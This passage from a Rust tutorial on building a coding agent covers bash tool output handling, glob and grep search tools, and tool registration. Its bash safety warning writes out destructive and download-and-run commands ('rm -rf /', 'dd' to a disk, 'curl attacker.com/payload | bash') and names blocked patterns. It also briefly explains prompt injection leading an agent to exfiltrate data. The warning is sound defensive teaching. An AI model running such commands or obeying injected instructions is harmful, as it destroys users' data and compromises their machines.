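        Ok(Err(e)) => Err(RunError::Spawn(e)),
        Err(()) => Err(RunError::Timeout),
    }
}

fn main() {
    assert_eq!(flatten(Ok(Ok("out".into()))), Ok("out".to_string()));
    assert_eq!(flatten(Err(())), Err(RunError::Timeout));
    assert_eq!(
        flatten(Ok(Err("bash not found".into()))),
        Err(RunError::Spawn("bash not found".to_string()))
    );
    println!("ok");
}
```

The same match shape applies directly to the real `tokio::time::timeout` return value, with `tokio::time::error::Elapsed` and `std::io::Error` in place of the stand-ins.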
Output format
The output construction logic handles three concerns: stdout, stderr, and the empty case.
```rust
let stdout = String::from_utf8_lossy(&output.stdout);
let stderr = String::from_utf8_lossy(&output.stderr);

let mut result = String::new();
if !stdout.is_empty() {
    result.push_str(&stdout);
}
if !stderr.is_empty() {
    if !result.is_empty() {
        result.push('\n');
    }
    result.push_str("stderr: ");
    result.push_str(&stderr);
}
if result.is_empty() {
    result.push_str("(no output)");
}
```
Walk through each decision:
Rust concept: String::from_utf8_lossy vs String::from_utf8
String::from_utf8_lossy returns a Cow<str> -- it borrows the original bytes if they are valid UTF-8 (zero-cost), or allocates a new String with replacement characters if they are not. The alternative, String::from_utf8(), returns Err on invalid UTF-8, which would require error handling for a case we want to tolerate. from_utf8_lossy is the right choice whenever you need a string but cannot guarantee the input encoding.
String::from_utf8_lossy converts the raw bytes to a string, replacing invalid UTF-8 sequences with the replacement character. Command output is not guaranteed to be valid UTF-8 -- binary data, locale-dependent encodings, or corrupted streams can all produce invalid bytes. Lossy conversion is the right default because the LLM needs a string, and a few replacement characters are better than a crash.
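A quick demonstration of the difference, using std only:

```rust
fn main() {
    // Valid UTF-8: the lossy conversion borrows the bytes at zero cost.
    let good = String::from_utf8_lossy(b"hello");
    assert_eq!(good, "hello");

    // 0xFF is never valid UTF-8; it becomes the replacement character U+FFFD.
    let bad = String::from_utf8_lossy(&[0x68, 0x69, 0xFF]);
    assert_eq!(bad, "hi\u{FFFD}");

    // The strict variant refuses the same input instead of tolerating it.
    assert!(String::from_utf8(vec![0xFF]).is_err());
    println!("ok");
}
```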
Stdout comes first, undecorated. This is the primary output. When ls lists files or cat prints content, that output appears verbatim. No prefix, no wrapping.
Stderr is prefixed with "stderr: ". This lets the LLM distinguish normal output from error output. Many commands write diagnostics to stderr even on success (compiler warnings, progress indicators, deprecation notices). The prefix prevents the model from misinterpreting warnings as failures. The newline before the prefix is only added if stdout was non-empty, keeping the output clean when stderr is the only content.
"(no output)" for silent commands. Commands like true, mkdir -p /tmp/foo, or cp a b produce no stdout and no stderr on success. Returning an empty string would confuse the LLM -- it might think the tool failed or the result was lost. The sentinel string confirms the command ran and had nothing to say.
As an extension, you could also report non-zero exit codes in the output string.
The reference implementation appends "exit code: N" when the process exits
with a non-zero status, helping the LLM diagnose failures.
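One way this extension could look, isolated into a pure function so it is easy to test. `format_output` is a hypothetical helper mirroring the output logic above, not a function in the starter; the "exit code: N" wording matches what the text says the reference implementation appends.

```rust
// Sketch: the output-combination logic plus the exit-code extension.
// `format_output` is illustrative, not part of the starter codebase.
fn format_output(stdout: &str, stderr: &str, code: Option<i32>) -> String {
    let mut result = String::new();
    if !stdout.is_empty() {
        result.push_str(stdout);
    }
    if !stderr.is_empty() {
        if !result.is_empty() {
            result.push('\n');
        }
        result.push_str("stderr: ");
        result.push_str(stderr);
    }
    if result.is_empty() {
        result.push_str("(no output)");
    }
    // The extension: surface non-zero exits so the LLM can diagnose failures.
    // `code` is Option<i32> because status.code() is None when killed by a signal.
    if let Some(c) = code.filter(|&c| c != 0) {
        result.push('\n');
        result.push_str(&format!("exit code: {c}"));
    }
    result
}

fn main() {
    assert_eq!(format_output("hi", "", Some(3)), "hi\nexit code: 3");
    assert_eq!(format_output("", "", Some(0)), "(no output)");
    assert_eq!(format_output("", "oops", Some(1)), "stderr: oops\nexit code: 1");
    println!("ok");
}
```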
Safety considerations
The bash tool is the most dangerous tool in the agent's arsenal. It can run
anything -- rm -rf /, dd if=/dev/zero of=/dev/sda, curl ... | bash.
The starter's simplified Tool trait does not include safety flags like
is_destructive(), but in a production agent (and in the reference
implementation), the bash tool would be marked as destructive, requiring explicit
user approval even in auto-approve mode.
The starter Tool trait has only definition() and call(). Adding safety
metadata (read-only, destructive, concurrent-safe flags) is an extension topic
covered in later chapters.
Safety warning
This tool passes LLM-generated commands directly to a bash shell. There is no sandboxing, no command filtering, no allowlist, no denylist. The LLM can run rm -rf / and your filesystem is gone. It can run curl attacker.com/payload | bash and your machine is compromised. It can read your SSH keys, your environment variables, your browser cookies.
This is not a hypothetical concern. LLMs can be manipulated through prompt injection -- malicious instructions hidden in file contents, README files, or web pages that the agent processes. A carefully crafted prompt injection could instruct the model to exfiltrate data or destroy files.
For the purposes of this tutorial, the bash tool is safe to use with trusted prompts in a controlled environment. Do not point it at untrusted input. Do not run it on a machine with sensitive data. Use a container, a VM, or at minimum a dedicated user account with limited permissions.
Chapters 13-16 build the safety infrastructure that makes the bash tool safe for production:
- Chapter 13 (Permissions) adds the permission engine that gates every tool call, requiring user approval for destructive operations.
- Chapter 14 (Safety) adds command classification that detects and blocks dangerous patterns like `rm -rf`, `chmod 777`, and `curl | bash`.
- Chapter 15 (Hooks) adds pre-tool hooks that can inspect and reject commands before execution.
- Chapter 16 (Plan Mode) adds a read-only mode where destructive tools are blocked entirely.
Until you build those chapters, treat the bash tool with the respect you would give sudo access to an unpredictable collaborator.
How Claude Code does it
Claude Code's bash tool shares the same core -- bash -c <command> with timeout -- but adds several layers of production hardening:
Command filtering. Before executing any command, Claude Code runs the command string through a safety classifier that checks for dangerous patterns. Commands like rm -rf /, chmod -R 777, curl ... | sh, and others are flagged or blocked outright. The classifier is not a simple regex -- it understands shell quoting and piping to avoid false positives.
Working directory management. Claude Code tracks and sets the working directory for each bash invocation. If the user cds into a directory in one command, subsequent commands remember that directory. Our version always runs in the process's current directory.
Process group killing on timeout. When our tool times out, the spawned process may continue running in the background. Claude Code creates a process group for each command and kills the entire group on timeout, ensuring no orphan processes linger.
Streaming stdout/stderr. Rather than buffering all output and returning it at the end, Claude Code pipes stdout and stderr to the TUI in real time. The user sees compilation output, test results, and progress indicators as they happen. This is essential for long-running commands where waiting for the final result would leave the user staring at a blank screen.
Permission engine integration. Every bash command passes through the permission engine before execution. Depending on the configuration, the user may be prompted to approve the command, the command may be auto-approved if it matches a safe pattern, or it may be denied outright.
Our version is the core protocol without the safety wrapping -- the minimal viable implementation that demonstrates how an LLM interacts with a shell. The production features are layers on top, not changes to the fundamental design.
Tests
Run the bash tool tests:
```bash
cargo test -p mini-claw-code-starter test_bash_
```
Here is what the bash-specific tests verify:
test_bash_definition -- Checks that the tool name is "bash".
test_bash_runs_command -- Runs a simple command and checks that stdout is captured.
test_bash_captures_stderr -- Runs a command that writes to stderr and checks that the output contains the stderr content.
test_bash_stdout_and_stderr -- Runs a command that produces both stdout and stderr, and verifies both appear in the output.
test_bash_no_output -- Runs true (a command that succeeds silently) and checks that the output indicates no output was produced.
test_bash_multiline_output -- Runs a multi-command pipeline and checks that all output lines appear.
Recap
You have built the bash tool -- the most important and most dangerous tool in the agent's toolkit:
- `command` is the one required parameter.
- `tokio::process::Command` with `bash -c` gives the LLM full shell access -- pipes, redirects, variables, and everything else bash supports.
- Output format combines stdout and labeled stderr into a single string. Silent commands return `"(no output)"` so the LLM knows the command ran.
- No safety rails -- this chapter builds the raw capability. The permission engine, safety classifier, hooks, and plan mode come in later chapters.
As extensions, you could add a timeout parameter (to prevent hung commands),
exit code reporting, and safety flags like is_destructive().
The bash tool completes the core tool set. Your agent can now read files, write files, edit files, and run arbitrary commands. With the SimpleAgent from the earlier chapters driving the loop, you have a functioning coding agent -- one that can understand a codebase, make changes, run tests, and iterate until the job is done.
Key takeaway
The bash tool is what makes a coding agent a programmer rather than a text editor. It is also the simplest tool to implement (a single Command::new("bash").arg("-c").arg(command) call) and the hardest to make safe. The implementation pattern -- capture output, label stderr, handle silence -- is reusable for any subprocess-based tool.
What's next
In Chapter 11: Search Tools you will build the tools that help the agent navigate large codebases -- glob for finding files by pattern and grep for searching file contents. These read-only tools are the agent's eyes, complementing the hands (bash, write, edit) you have already built.
Chapter 11: Search Tools
File(s) to edit: (extension -- no stubs in starter)
Tests: No tests in the starter. GlobTool and GrepTool are extension tools.
Estimated time: 25 min (read-only)
Goal
- Understand why file discovery (GlobTool) and content search (GrepTool) are separate tools with distinct parameter schemas.
- Implement `GlobTool` so the agent can find files by name pattern using the `glob` crate.
- Implement `GrepTool` with recursive directory walking, regex matching, and an optional file type filter.
- Learn when to use async vs sync helper functions in tool implementations (I/O-bound file reads vs fast directory walking).
A coding agent that can only read files it already knows about is like a developer who never uses find or grep. You can hand it a specific file path and it will read it faithfully, but drop it into an unfamiliar codebase and it is blind. It cannot discover which files exist, cannot search for where a function is defined, cannot find all the places a type is used. Without search, the LLM has to guess file paths -- and it will guess wrong.
Search tools fix this. In this chapter we explore two: GlobTool finds files by name pattern, and GrepTool searches file contents by regex. Together they give the LLM the ability to navigate any codebase, no matter how large or unfamiliar. These are the eyes of the agent.
How the search tools fit into the agent workflow
```mermaid
flowchart TD
    LLM[LLM decides what to do]
    LLM -->|"What files exist?"| Glob[GlobTool]
    LLM -->|"Where is this defined?"| Grep[GrepTool]
    Glob -->|returns file paths| LLM
    Grep -->|"returns path:line: content"| LLM
    LLM -->|reads specific file| Read[ReadTool]
    LLM -->|modifies file| Edit[EditTool]
    Read -->|file contents| LLM
    Edit -->|confirmation| LLM
```
Note: Search tools are extensions in this book -- neither the starter (`mini-claw-code-starter`) nor the reference implementation (`mini-claw-code`) ships a `GlobTool` or `GrepTool`. If you want to add them, you will create `src/tools/glob.rs` and `src/tools/grep.rs` from scratch and register them in `src/tools/mod.rs`. The complete reference code for both tools is reproduced inline below -- treat this chapter as an annotated implementation walkthrough rather than a stub-filling exercise.
Two tools, two questions
The split between glob and grep maps to two distinct questions the LLM asks when exploring code:
- "What files exist?" -- GlobTool. The LLM knows it wants Rust files, or test files, or config files. It does not know their exact paths. A glob pattern like `**/*.rs` or `tests/*.toml` answers this.
- "Where is this thing defined?" -- GrepTool. The LLM knows a function name, a type, an error message. It needs to find which file and which line contain it. A regex pattern like `fn parse_sse_line` or `struct QueryConfig` answers this.
Claude Code has both as separate tools for exactly this reason. They serve different purposes, take different inputs, and the LLM chooses between them based on what it knows. Merging them into one tool would muddy the interface -- the LLM would have to figure out whether it is doing a name search or a content search, and the parameter schema would be awkward.
GlobTool
GlobTool is the simpler of the two. It takes a glob pattern, optionally scoped to a base directory, and returns all matching file paths.
File layout
The implementation lives at src/tools/glob.rs. Here is the complete code:
```rust
use async_trait::async_trait;
use serde_json::Value;

use crate::types::*;

pub struct GlobTool {
    definition: ToolDefinition,
}

impl GlobTool {
    pub fn new() -> Self {
        Self {
            definition: ToolDefinition::new("glob", "Find files matching a glob pattern")
                .param("pattern", "string", "Glob pattern (e.g. \"**/*.rs\")", true)
                .param(
                    "path",
                    "string",
                    "Base directory to search in (default: current directory)",
                    false,
                ),
        }
    }
}

impl Default for GlobTool {
    fn default() -> Self {
        Self::new()
    }
}

#[async_trait]
impl Tool for GlobTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        let pattern = args["pattern"]
            .as_str()
            .ok_or_else(|| anyhow::anyhow!("missing 'pattern' argument"))?;
        let base = args
            .get("path")
            .and_then(|v| v.as_str())
            .unwrap_or(".");

        let full_pattern = if pattern.starts_with('/') || pattern.starts_with('.') {
            pattern.to_string()
        } else {
            format!("{base}/{pattern}")
        };

        let entries: Vec<String> = glob::glob(&full_pattern)
            .map_err(|e| anyhow::anyhow!("invalid glob pattern: {e}"))?
            .filter_map(|entry| entry.ok())
            .map(|p| p.display().to_string())
            .collect();

        if entries.is_empty() {
            Ok("no files matched".to_string())
        } else {
            Ok(entries.join("\n"))
        }
    }
}
```
Walking through the implementation
The definition. Two parameters: pattern (required) and path (optional). The pattern is a standard glob -- *.rs for Rust files in the current directory, **/*.rs for Rust files recursively, src/**/*.toml for TOML files under src/. The path sets the base directory; it defaults to "." (the current working directory) when omitted.
Pattern construction. The call method builds the full glob pattern from the base directory and the user-supplied pattern. If the pattern already starts with / or ., it is treated as an absolute or relative path and used directly. Otherwise, the base directory is prepended: format!("{base}/{pattern}"). This means calling with {"pattern": "*.rs", "path": "/home/user/project"} produces the glob /home/user/project/*.rs.
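The prefix rule can be isolated as a tiny pure function. This is a sketch for illustration; `full_pattern` is not a named helper in the tool, which inlines the same logic.

```rust
// Sketch: the pattern-construction rule described above, extracted so the
// two branches are easy to exercise. `full_pattern` is illustrative.
fn full_pattern(pattern: &str, base: &str) -> String {
    if pattern.starts_with('/') || pattern.starts_with('.') {
        // Absolute or explicitly relative: use the pattern as-is.
        pattern.to_string()
    } else {
        // Otherwise scope the pattern under the base directory.
        format!("{base}/{pattern}")
    }
}

fn main() {
    assert_eq!(full_pattern("*.rs", "/home/user/project"), "/home/user/project/*.rs");
    assert_eq!(full_pattern("./src/*.rs", "."), "./src/*.rs");
    assert_eq!(full_pattern("/etc/*.conf", "."), "/etc/*.conf");
    println!("ok");
}
```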
The glob crate. We use the glob crate (already in Cargo.toml) to do the actual matching. glob::glob() returns an iterator of Result<PathBuf> entries. We filter_map with entry.ok() to silently skip any paths that fail (permission errors, broken symlinks). The remaining paths are converted to display strings and collected.
Output format. Matching paths are joined with newlines -- one path per line. If nothing matches, we return "no files matched" rather than an empty string. This matters for the LLM: an explicit "no files matched" message tells it the pattern was valid but found nothing, prompting it to try a different pattern. An empty string would be ambiguous.
GrepTool
GrepTool is more complex. It searches file contents using regex, optionally scoped to a directory and filtered by file type. The output follows the classic grep format: path:line_no: content.
The complete implementation
Here is src/tools/grep.rs:
```rust
use std::path::Path;

use async_trait::async_trait;
use serde_json::Value;

use crate::types::*;

pub struct GrepTool {
    definition: ToolDefinition,
}

impl GrepTool {
    pub fn new() -> Self {
        Self {
            definition: ToolDefinition::new("grep", "Search file contents using a regex pattern")
                .param("pattern", "string", "Regex pattern to search for", true)
                .param(
                    "path",
                    "string",
                    "File or directory to search in (default: current directory)",
                    false,
                )
                .param(
                    "include",
                    "string",
                    "Glob pattern to filter files (e.g. \"*.rs\")",
                    false,
                ),
        }
    }
}

impl Default for GrepTool {
    fn default() -> Self {
        Self::new()
    }
}

#[async_trait]
impl Tool for GrepTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        let pattern = args["pattern"]
            .as_str()
            .ok_or_else(|| anyhow::anyhow!("missing 'pattern' argument"))?;
        let re = regex::Regex::new(pattern)
            .map_err(|e| anyhow::anyhow!("invalid regex pattern: {e}"))?;

        let search_path = args
            .get("path")
            .and_then(|v| v.as_str())
            .unwrap_or(".");
        let include_pattern = args.get("include").and_then(|v| v.as_str());
        let include_glob = include_pattern
            .map(|p| glob::Pattern::new(p))
            .transpose()
            .map_err(|e| anyhow::anyhow!("invalid include pattern: {e}"))?;

        let path = Path::new(search_path);
        let mut matches = Vec::new();

        if path.is_file() {
            search_file(&re, path, &mut matches).await;
        } else if path.is_dir() {
            let mut entries = Vec::new();
            collect_files(path, &include_glob, &mut entries);
            entries.sort();
            for file_path in entries {
                search_file(&re, &file_path, &mut matches).await;
            }
        } else {
            anyhow::bail!("path does not exist: {search_path}");
        }

        if matches.is_empty() {
            Ok("no matches found".to_string())
        } else {
            Ok(matches.join("\n"))
        }
    }
}

/// Search a single file for regex matches and append formatted results.
async fn search_file(re: &regex::Regex, path: &Path, matches: &mut Vec<String>) {
    let Ok(content) = tokio::fs::read_to_string(path).await else {
        return; // Skip binary/unreadable files
    };
    let display = path.display();
    for (line_no, line) in content.lines().enumerate() {
        if re.is_match(line) {
            matches.push(format!("{display}:{}: {line}", line_no + 1));
        }
    }
}

/// Recursively collect files from a directory, optionally filtering by glob.
fn collect_files(
    dir: &Path,
    include: &Option<glob::Pattern>,
    out: &mut Vec<std::path::PathBuf>,
) {
    let Ok(entries) = std::fs::read_dir(dir) else {
        return;
    };
    for entry in entries.flatten() {
        let path = entry.path();
        if path.is_dir() {
            // Skip hidden directories
            if path
                .file_name()
                .is_some_and(|n| n.to_string_lossy().starts_with('.'))
            {
                continue;
            }
            collect_files(&path, include, out);
        } else if path.is_file() {
            if let Some(glob) = include {
                let name = path
                    .file_name()
                    .map(|n| n.to_string_lossy().to_string())
                    .unwrap_or_default();
                if !glob.matches(&name) {
                    continue;
                }
            }
            out.push(path);
        }
    }
}
```
Walking through the implementation
There is more going on here, so let's take it piece by piece.
The definition. Three parameters: pattern (required regex), path (optional file or directory), and include (optional glob filter for file names). The LLM might call it as {"pattern": "fn main"} to search the current directory, or {"pattern": "TODO", "path": "src/", "include": "*.rs"} to search only Rust files under src/.
Regex compilation. The pattern is compiled into a regex::Regex upfront. If the LLM provides an invalid regex (missing closing bracket, bad escape), we return an error immediately rather than crashing partway through the search. The regex crate handles the full Rust regex syntax -- character classes, quantifiers, alternation, captures.
The include filter. The include parameter is a glob pattern, not a regex. We compile it into a glob::Pattern using the same glob crate that powers GlobTool.
Rust concept: Option::transpose
The .transpose() call converts Option<Result<T>> into Result<Option<T>>. This is a common Rust idiom when you have an optional operation that might fail. Without transpose, you would need a match or if let to handle the Some(Ok(...)), Some(Err(...)), and None cases separately. With it, you can use ? to propagate the error and end up with a clean Option<T>. The pattern x.map(fallible_fn).transpose()? reads as: "if present, try the operation; if it fails, propagate the error; if absent, produce None."
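The idiom is easy to see with a small std-only example, using integer parsing as the stand-in fallible operation (`parse_optional` is illustrative, not part of the codebase):

```rust
// Minimal demonstration of x.map(fallible_fn).transpose():
// Option<Result<i32, _>> becomes Result<Option<i32>, _>.
fn parse_optional(s: Option<&str>) -> Result<Option<i32>, std::num::ParseIntError> {
    s.map(|s| s.parse::<i32>()).transpose()
}

fn main() {
    assert_eq!(parse_optional(Some("42")), Ok(Some(42)));   // present, parses
    assert_eq!(parse_optional(None), Ok(None));             // absent: no error
    assert!(parse_optional(Some("not a number")).is_err()); // present, fails
    println!("ok");
}
```

In GrepTool the same shape appears as `include_pattern.map(|p| glob::Pattern::new(p)).transpose()`, with `?` then propagating any compile error.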
Three-way path dispatch. The search path can be a file, a directory, or nonexistent:
- File: Search just that one file. The LLM does this when it already knows which file to look in.
- Directory: Recursively collect all files (filtered by `include` if provided), sort them for deterministic output, then search each one.
- Nonexistent: Return an error via `bail!`. The agent loop catches this and reports it to the LLM as `"error: path does not exist: /nonexistent/path"`, and the model can recover by trying a different path.
Output format. Each match is formatted as path:line_no: content, following the classic grep convention. Line numbers are 1-based (humans and LLMs both expect line 1 to be the first line, not line 0). When no matches are found, the tool returns "no matches found" -- again, explicit is better than empty.
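The format is easy to rehearse in isolation. A sketch, with plain substring matching standing in for the regex (`grep_lines` is illustrative, not a helper in the tool):

```rust
// Sketch: the grep output convention -- path, 1-based line number, then the
// matching line, separated by colons. Substring search stands in for regex.
fn grep_lines(path: &str, content: &str, needle: &str) -> Vec<String> {
    content
        .lines()
        .enumerate()
        .filter(|(_, line)| line.contains(needle))
        .map(|(line_no, line)| format!("{path}:{}: {line}", line_no + 1))
        .collect()
}

fn main() {
    let content = "fn main() {\n    println!(\"hello\");\n}";
    let matches = grep_lines("src/main.rs", content, "println");
    assert_eq!(matches.len(), 1);
    // enumerate() is 0-based, so the second line reports as line 2.
    assert!(matches[0].starts_with("src/main.rs:2: "));
    println!("{}", matches.join("\n"));
}
```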
Helper function design
Rust concept: choosing async vs sync for helpers
The two helper functions -- search_file and collect_files -- are deliberately designed with different signatures. Understanding why reveals practical Rust async patterns. The decision rule is simple: if the function does I/O that could block (reading file contents), make it async. If it does fast metadata operations (listing directory entries), keep it sync. Making everything async "just in case" adds complexity -- recursive async functions require Pin<Box<dyn Future>> or the async_recursion crate -- and provides no benefit when the operation is already fast.
search_file is async
```rust
async fn search_file(re: &regex::Regex, path: &Path, matches: &mut Vec<String>) {
    let Ok(content) = tokio::fs::read_to_string(path).await else {
        return; // Skip binary/unreadable files
    };
    let display = path.display();
    for (line_no, line) in content.lines().enumerate() {
        if re.is_match(line) {
            matches.push(format!("{display}:{}: {line}", line_no + 1));
        }
    }
}
```
This function reads a file from disk, which is I/O. Using tokio::fs::read_to_string instead of std::fs::read_to_string keeps the async runtime free to do other work while waiting on the filesystem. In a real agent with concurrent tool execution, this matters -- a slow NFS mount or large file should not block the entire runtime.
The let Ok(content) = ... else { return; } pattern is a quiet bailout. If the file cannot be read -- it is binary, it is a symlink to a deleted file, the user lacks permissions -- we silently skip it. This is the right behavior for a search tool. The LLM asked "where does this pattern appear?" and the answer should only include files where we could actually check. Reporting an error for every unreadable file in a directory tree would drown the useful results in noise.
collect_files is sync
```rust
fn collect_files(
    dir: &Path,
    include: &Option<glob::Pattern>,
    out: &mut Vec<std::path::PathBuf>,
) {
    let Ok(entries) = std::fs::read_dir(dir) else {
        return;
    };
    for entry in entries.flatten() {
        let path = entry.path();
        if path.is_dir() {
            if path
                .file_name()
                .is_some_and(|n| n.to_string_lossy().starts_with('.'))
            {
                continue;
            }
            collect_files(&path, include, out);
        } else if path.is_file() {
            if let Some(glob) = include {
                let name = path
                    .file_name()
                    .map(|n| n.to_string_lossy().to_string())
                    .unwrap_or_default();
                if !glob.matches(&name) {
                    continue;
                }
            }
            out.push(path);
        }
    }
}
```
Directory walking is fast -- it reads metadata, not file contents. Making it async would add complexity (recursive async functions require boxing) without meaningful performance benefit. The sync std::fs::read_dir is fine here.
Three details worth noting:
Hidden directory skipping. Directories whose names start with . are skipped entirely. This excludes .git, .cargo, .vscode, node_modules hidden behind a dot-prefix, and similar directories that are almost never what the LLM wants to search. Without this filter, a grep through a project directory would spend most of its time scanning .git/objects -- thousands of binary blob files that produce no useful matches.
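The check itself is a one-liner worth seeing in isolation. A sketch; `is_hidden` is an extracted illustration of the condition inside `collect_files`, not a separate helper in the tool:

```rust
use std::path::Path;

// The hidden-directory condition from collect_files: the final path
// component (file_name) starts with a dot.
fn is_hidden(path: &Path) -> bool {
    path.file_name()
        .is_some_and(|n| n.to_string_lossy().starts_with('.'))
}

fn main() {
    assert!(is_hidden(Path::new("repo/.git")));
    assert!(is_hidden(Path::new(".cargo")));
    assert!(!is_hidden(Path::new("repo/src")));
    println!("ok");
}
```

Note that only the final component is inspected, so a non-hidden file inside a hidden directory is excluded by the recursion being cut off, not by this check.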
The include filter. When present, the glob pattern is matched against the file name only (not the full path). This means "*.rs" matches src/main.rs by checking just main.rs against the pattern. This is intuitive -- when the LLM says "search only Rust files," it means files ending in .rs, regardless of where they live in the tree.
The sort. After collecting all files, the caller sorts them before searching. This ensures deterministic output order. Without sorting, read_dir returns entries in filesystem order, which varies across operating systems and even across runs on the same system. Deterministic output makes tests reliable and makes the LLM's experience consistent.
Why two separate tools
You might wonder: why not one SearchTool with a mode parameter? The answer comes down to how LLMs make decisions.
When the LLM sees two separate tools in its schema -- one called glob described as "find files matching a pattern" and one called grep described as "search file contents using regex" -- it can instantly match its intent to the right tool. "I need to find all test files" maps to glob. "I need to find where parse_sse_line is defined" maps to grep.
A combined tool with a mode: "files" | "content" parameter adds a decision layer. The LLM has to read the schema more carefully, understand the mode field, and get it right. With smaller models, this extra indirection leads to mistakes -- calling the tool in the wrong mode, or omitting the mode parameter entirely.
Claude Code keeps them separate. So do we.
There is also a practical reason: the parameter sets are different. Glob takes a glob pattern and a base path. Grep takes a regex pattern, a path, and an include filter. Merging them would mean the LLM always sees parameters that are irrelevant to what it is doing, which wastes context tokens and increases the chance of confusion.
How Claude Code does it
Our implementations are the essential protocol -- they capture the core behavior in under 200 lines. Claude Code's production versions are considerably more sophisticated.
Claude Code's Glob uses ripgrep internally for speed. On large codebases with hundreds of thousands of files, the glob crate's pure-Rust implementation can be slow. Ripgrep's directory walker is optimized for this use case, respecting .gitignore rules and parallelizing the walk. Claude Code's Glob also supports sorting results by modification time (most recently changed files first, which is often what the LLM wants) and limits the number of results to avoid flooding the context window.
Claude Code's Grep is equally enhanced. It supports context lines (-A, -B, -C flags) to show surrounding code, which helps the LLM understand matches without making a separate read call. It offers multiple output modes: show matching lines (default), show only file paths (for counting), or show match counts per file. File type filtering uses ripgrep's built-in type system rather than a glob pattern, so --type rust knows about .rs files, Cargo.toml, and build.rs without the user spelling out the glob.
Our versions skip all of this. We use the glob crate instead of ripgrep, we have no context lines, no output modes, no result limits. What we do have is the correct protocol: the LLM sends a pattern and gets back matching results in a format it can parse. Everything else is optimization. If you want to upgrade later, the Tool trait interface stays the same -- only the internals of call() change.
Tests
Since GlobTool and GrepTool are extensions, neither the starter nor the
reference implementation ships tests for them. The assertions below describe
the test cases you would add alongside the tool code if you build these out
yourself -- they are the contract the tools should satisfy. Once you have
copied the tool code into mini-claw-code-starter/src/tools/ and written
these tests, you can run them with:
cargo test -p mini-claw-code-starter grep
Recommended test cases:
GlobTool tests
test_grep_glob_find_files -- Creates a temp directory with a.rs, b.rs, and c.txt. Globs for *.rs. Verifies that both .rs files appear in the result and the .txt file does not.
test_grep_glob_recursive -- Creates a temp directory with top.rs at the root and sub/deep.rs in a subdirectory. Globs for **/*.rs. Verifies that both files are found, confirming recursive descent works.
test_grep_glob_no_matches -- Creates a temp directory with file.txt and globs for *.xyz. Verifies the result contains "no files matched".
test_grep_glob_definition -- Verifies the tool definition has the name "glob".
GrepTool tests
test_grep_grep_single_file -- Creates a file containing fn main() and println!("hello"). Greps for "println". Verifies the match includes the content and the correct line number (:2:).
test_grep_grep_directory -- Creates two files, both containing fn foo(). Greps the directory for "fn foo". Verifies both files appear in the results.
test_grep_grep_with_include -- Creates code.rs and data.txt, both containing "hello world". Greps with include: "*.rs". Verifies only the .rs file appears in results.
test_grep_grep_no_matches -- Creates a file and greps for a pattern that does not appear. Verifies the result contains "no matches found".
test_grep_grep_regex -- Creates a file with foo123, bar456, baz789. Greps with the regex \d{3} (three digits). Verifies all three lines match, confirming real regex support rather than plain string matching.
test_grep_grep_nonexistent_path -- Greps a path that does not exist. Verifies the result is an error.
test_grep_grep_definition -- Verifies the tool definition has the name "grep".
Recap
This chapter added two search tools that let the agent discover and navigate code:
- GlobTool finds files by name pattern. It takes a glob like `**/*.rs` and returns matching paths, one per line. It uses the `glob` crate for pattern matching and defaults to the current directory when no base path is provided.
- GrepTool searches file contents by regex. It takes a pattern like `fn main` and returns matches in `path:line_no: content` format. It supports scoping to a file or directory and filtering by file type with the `include` parameter. Two helper functions split the work: `search_file` (async, handles I/O) and `collect_files` (sync, walks the directory tree).
- Both tools are read-only. They never modify the filesystem. In a production agent with safety flags, they would be marked as read-only and concurrent-safe.
- The separation is deliberate. Glob answers "what files exist?" Grep answers "where is this content?" Two tools with clear purposes are easier for the LLM to use correctly than one tool with a mode switch.
- These are extensions. The starter does not include stubs for GlobTool or GrepTool. If you want to add them, create the files from scratch following the patterns shown above and register them in `src/tools/mod.rs`.
Key takeaway
Search tools are what turn a coding agent from a tool that edits known files into one that can explore and understand an unfamiliar codebase. The two-tool split (glob for names, grep for contents) maps directly to the two questions a developer asks when navigating code: "what files exist?" and "where is this thing?" Keeping them separate gives the LLM a clear, unambiguous interface for each question.
With search tools in place, the agent can now explore an unfamiliar codebase on its own. Given a prompt like "find and fix the bug in the parser," it can glob for source files, grep for the parser code, read the relevant files, and then use the write and edit tools from Chapter 9 to make changes. The tool suite is becoming complete.
Check yourself
← Chapter 10: Bash Tool · Contents · Chapter 12: Tool Registry →
Chapter 12: Tool Registry
File(s) to edit:
`src/types.rs` (ToolSet) · Test to run: `cargo test -p mini-claw-code-starter test_multi_tool_` (integration tests) · Estimated time: 30 min
You have five tools. You have a SimpleAgent. This chapter wires them together.
Goal
- Build a `default_tools()` helper that assembles all tools into a single `ToolSet` so the agent can discover and dispatch them by name.
- Wire the `ToolSet` to `SimpleAgent` so the LLM sees all tool schemas and the agent dispatches calls to the correct tool.
- Handle unknown tool calls gracefully by returning an error string that lets the LLM recover.
- Run the full integration test suite proving that real tools execute with real side effects inside the agent loop.
Over the past chapters you built the individual tools that let your agent interact with the world -- file reading and writing (Chapter 9), command execution (Chapter 10), and optionally pattern search (Chapter 11). Each tool implements the Tool trait, has a JSON schema, and returns a String. But they exist in isolation. The agent has no way to discover them, expose their schemas to the LLM, or dispatch calls by name.
The tool registry is the bridge. It holds every available tool in a single ToolSet, exposes their schemas to the LLM so it knows what it can call, and dispatches incoming tool calls to the correct implementation by name. By the end of this chapter, you will have a fully functional coding agent that can read, write, edit, and execute commands -- the complete tool loop, now with real tools instead of test doubles.
cargo test -p mini-claw-code-starter test_multi_tool_
The module layout
All tool implementations live under src/tools/, one file per tool:
src/tools/
mod.rs -- re-exports everything
ask.rs -- AskTool (bonus)
bash.rs -- BashTool
edit.rs -- EditTool
read.rs -- ReadTool
write.rs -- WriteTool
The mod.rs is a flat barrel file:
```rust
mod ask;
mod bash;
mod edit;
mod read;
mod write;

pub use ask::*;
pub use bash::BashTool;
pub use edit::EditTool;
pub use read::ReadTool;
pub use write::WriteTool;
```
Every tool is a separate file with a single public struct. The mod.rs re-exports the structs so downstream code can write use crate::tools::{ReadTool, WriteTool} without reaching into individual modules.
The flat structure is deliberate. There is no tools/file/mod.rs grouping ReadTool, WriteTool, and EditTool together. Why? Because tools are always referenced individually -- you register ReadTool::new(), not FileTools::all(). A flat module keeps the import paths short and the mental model simple. When you have 5 tools this is obviously fine. Claude Code has 40+ tools and still uses a similar flat layout -- each tool is its own module with a single export.
Key Rust concept: trait objects and dynamic dispatch
